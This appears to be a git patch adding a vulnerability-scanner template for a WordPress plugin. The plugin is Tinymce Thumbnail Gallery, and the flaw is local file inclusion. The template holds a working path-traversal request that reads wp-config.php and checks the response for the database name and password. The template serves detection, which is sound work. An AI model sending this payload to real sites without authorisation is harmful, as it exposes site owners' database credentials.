From c3c2fb4945664c5e204accdbe3da55d69a291c73 Mon Sep 17 00:00:00 2001
From: Roberto Nunes <46332131+Akokonunes@users.noreply.github.com>
Date: Tue, 26 Oct 2021 08:09:35 +0900
Subject: [PATCH] Create wp-tinymce-thumbnail-plugin-lfi.yaml

---
 wp-tinymce-thumbnail-plugin-lfi.yaml | 26 ++++++++++++++++++++++++++
 1 file changed, 26 insertions(+)
 create mode 100644 wp-tinymce-thumbnail-plugin-lfi.yaml

diff --git a/wp-tinymce-thumbnail-plugin-lfi.yaml b/wp-tinymce-thumbnail-plugin-lfi.yaml
new file mode 100644
index 0000000000..0ae06d6b01
--- /dev/null
+++ b/wp-tinymce-thumbnail-plugin-lfi.yaml
@@ -0,0 +1,26 @@
+id: wp-tinymce-thumbnail-plugin-lfi
+
+info:
+  name: Tinymce Thumbnail Gallery <= 1.0.7 - download-image.php LFI
+  author: 0x_Akoko
+  severity: high
+  tags: wordpress,wp-theme,lfi,wp
+  reference: https://wpscan.com/vulnerability/4a49b023-c1c9-4cc4-a2fd-af5f911bb400
+
+requests:
+  - method: GET
+    path:
+      - '{{BaseURL}}/wp-content/plugins/tinymce-thumbnail-gallery/php/download-image.php?href=../../../../wp-config.php'
+
+    matchers-condition: and
+    matchers:
+      - type: word
+        words:
+          - "DB_NAME"
+          - "DB_PASSWORD"
+        part: body
+        condition: and
+
+      - type: status
+        status:
+          - 200